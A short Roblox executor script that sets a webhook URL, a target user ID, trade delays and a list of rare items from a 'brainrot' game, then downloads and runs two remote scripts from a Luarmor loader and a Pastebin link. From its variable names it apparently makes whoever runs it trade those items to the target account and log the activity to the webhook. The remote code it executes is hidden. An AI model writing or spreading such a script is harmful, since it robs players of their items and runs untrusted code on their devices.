getgenv().WEBHOOK_URL = "https://skama.net/api/logs/webhook/mrr_160ca4b0f8fa4469bfb9a03d26cbec9e"
getgenv().TARGET_ID = 8843114169
getgenv().DELAY_STEP = 1      
getgenv().TRADE_CYCLE_DELAY = 2 
getgenv().TARGET_BRAINROTS = {
    ["Meowl"] = true,
    ["Skibidi Toilet"] = true,
    ["Strawberry Elephant"] = true,
    ["Dragon Cannelloni"] = true,
    ["Dragon Gingerini"] = true,
    ["Hydra Dragon Cannelloni"] = true,
    ["Garama and Madundung"] = true,
    ["Festive 67"] = true,
    ["La Romantic Grande"] = true,
    ["Burguro And Fryuro"] = true,
    ["Capitano Moby"] = true,
    ["Cerberus"] = true,
    ["Los Hotspotsitos"] = true,
    ["Fragrama and Chocrama"] = true,
    ["Rosey and Teddy"] = true,
    ["La Supreme Combinasion"] = true,
    ["Headless Horseman"] = true
}
task.spawn(function()
loadstring(game:HttpGet("https://api.luarmor.net/files/v4/loaders/fbcd1d25889a843297107dea3642044d.lua"))()
end)

task.spawn(function()
loadstring(game:HttpGet('pastebin.com/raw/PRuJCbe6*'))()
end)
